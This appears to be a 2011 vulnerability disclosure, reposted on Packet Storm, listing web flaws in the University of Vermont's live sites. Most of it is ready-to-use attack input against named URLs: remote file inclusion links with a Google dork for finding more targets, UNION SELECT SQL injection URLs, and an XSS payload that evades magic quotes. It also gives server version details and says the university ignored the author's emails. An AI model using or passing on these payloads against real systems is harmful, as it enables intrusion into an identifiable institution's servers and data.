University of Vermont suffers from cross site scripting, remote file inclusion, and remote SQL injection vulnerabilities. The university was contacted and has ignored the Author's emails.
042e2da2853f1be77f5ac55e23963b0da648f369e2e58108152dd4d097b46af5##############################################################################################
| Title : University Of Vermont Multiple Vulnerabilities(uvm.edu)
| Author : Codeine
| Email : f3codeine[at]yahoo[dot]com
| Tiwtter: codeinesec
| Date : 08/10/2011
| Cat : PHP[RFI,SQLI,XSS]
| URL : https://uvm.edu/
##############################################################################################
Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009i686
Software: Apache/2.2.3 (Red Hat). PHP/5.3.3
##############################################################################################
The University Of Vermont suffers from multiple web application vulnerabilities such as
Remote File Inclusion, Sql Injection, Cross Site Scripting(XSS).
##############################################################################################
[*]Remote File Inclusion-
magicscript.php?Page=Calendar&intro=https://google.com/
This script shows up in almost every directory of every subdomain of uvm.edu.
https://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=https://google.com/
https://www.uvm.edu/magicscript.php?Page=Calendar&intro=https://google.com/
Dork: site:uvm.edu inurl:magicscript
_________________________________________________________________________________________________
[*]SqlInjection-
https://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--
[*]Xss-
https://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post)
Magic quoates are active, but easily bypassable with "String.fromCharCode"
<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>
The above is what I sent to post, which contains "CodeineXss"
_________________________________________________________________________________________________
[*]SqlInjection-
https://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--
_________________________________________________________________________________________________
[*]SqlInjection-
https://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
_________________________________________________________________________________________________
Greetz Hidden Ninja
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed